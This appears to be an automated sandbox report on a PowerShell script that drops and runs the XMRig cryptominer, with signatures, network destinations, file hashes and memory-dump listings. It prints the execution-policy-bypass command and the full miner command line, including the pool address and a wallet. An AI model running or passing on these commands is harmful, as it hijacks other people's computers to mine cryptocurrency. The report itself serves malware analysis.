memory/3600-54-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-57-0x0000020E59BC0000-0x0000020E59BE0000-memory.dmp
memory/3600-56-0x0000020DC7000000-0x0000020DC7020000-memory.dmp
memory/3600-55-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-58-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-59-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-60-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-61-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-62-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-63-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-64-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-65-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-66-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-67-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-68-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-69-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-70-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-71-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-72-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-73-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-74-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-75-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-76-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-77-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-78-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-79-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-80-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-81-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-82-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-83-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-84-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-85-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-86-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-87-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-88-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-89-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-90-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-91-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-92-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-93-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-94-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-95-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-96-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-97-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-98-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-99-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-100-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-101-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-102-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-103-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-104-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-105-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-106-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-107-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-108-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-109-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-110-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-111-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-112-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-113-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-114-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-115-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
memory/3600-116-0x00007FF7B37F0000-0x00007FF7B4423000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:32
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1779s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1868 wrote to memory of 2092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1868 wrote to memory of 2092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.71.105.51.in-addr.arpa | udp |
Files
memory/1868-0-0x00007FFED0E03000-0x00007FFED0E05000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4m2p3uh3.yit.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1868-1-0x000001DDAD9F0000-0x000001DDADA12000-memory.dmp
memory/1868-11-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/1868-12-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/1868-14-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/1868-15-0x000001DDADF10000-0x000001DDADF22000-memory.dmp
memory/1868-16-0x000001DDADB20000-0x000001DDADB2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2092-47-0x0000021C96190000-0x0000021C961B0000-memory.dmp
memory/2092-48-0x0000021C961E0000-0x0000021C96200000-memory.dmp
memory/2092-49-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-52-0x0000021C97AE0000-0x0000021C97B00000-memory.dmp
memory/2092-51-0x0000021C97AC0000-0x0000021C97AE0000-memory.dmp
memory/1868-50-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/1868-54-0x00007FFED0E03000-0x00007FFED0E05000-memory.dmp
memory/2092-53-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/1868-55-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp
memory/2092-56-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-57-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-59-0x0000021C97AE0000-0x0000021C97B00000-memory.dmp
memory/2092-58-0x0000021C97AC0000-0x0000021C97AE0000-memory.dmp
memory/2092-60-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-61-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-62-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-63-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-64-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-65-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-66-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-67-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-68-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-69-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-70-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-71-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-72-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-73-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-74-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-75-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-76-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-77-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-78-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-79-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-80-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-81-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-82-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-83-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-84-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-85-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-86-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-87-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-88-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-89-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-90-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-91-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-92-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-93-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-94-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-95-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-96-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-97-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-98-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-99-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-100-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-101-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-102-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-103-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-104-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-105-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-106-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-107-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-108-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-109-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-110-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-111-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-112-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-113-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-114-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-115-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-116-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-117-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
memory/2092-118-0x00007FF6B6AB0000-0x00007FF6B76E3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:36
Platform
win11-20240426-en
Max time kernel
1798s
Max time network
1764s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4140 wrote to memory of 4032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4140 wrote to memory of 4032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 52.111.229.19:443 | tcp |
Files
memory/4140-0-0x00007FFA43393000-0x00007FFA43395000-memory.dmp
memory/4140-1-0x000002D79E520000-0x000002D79E542000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5fzvcclf.01y.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4140-10-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp
memory/4140-11-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp
memory/4140-12-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp
memory/4140-14-0x000002D79E790000-0x000002D79E7A2000-memory.dmp
memory/4140-15-0x000002D79E500000-0x000002D79E50A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4032-46-0x0000016CF9AC0000-0x0000016CF9AE0000-memory.dmp
memory/4032-48-0x0000016CF9B10000-0x0000016CF9B30000-memory.dmp
memory/4140-47-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp
memory/4140-50-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp
memory/4140-49-0x00007FFA43393000-0x00007FFA43395000-memory.dmp
memory/4032-51-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-54-0x0000016CFB2E0000-0x0000016CFB300000-memory.dmp
memory/4032-53-0x0000016CFB300000-0x0000016CFB320000-memory.dmp
memory/4032-52-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-55-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-56-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-57-0x0000016CFB300000-0x0000016CFB320000-memory.dmp
memory/4032-58-0x0000016CFB2E0000-0x0000016CFB300000-memory.dmp
memory/4032-59-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-60-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-61-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-62-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-63-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-64-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-65-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-66-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-67-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-68-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-69-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-70-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-71-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-72-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-73-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-74-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-75-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-76-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-77-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-78-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-79-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-80-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-81-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-82-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-83-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-84-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-85-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-86-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-87-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-88-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
memory/4032-89-0x00007FF72E5E0000-0x00007FF72F213000-memory.dmp
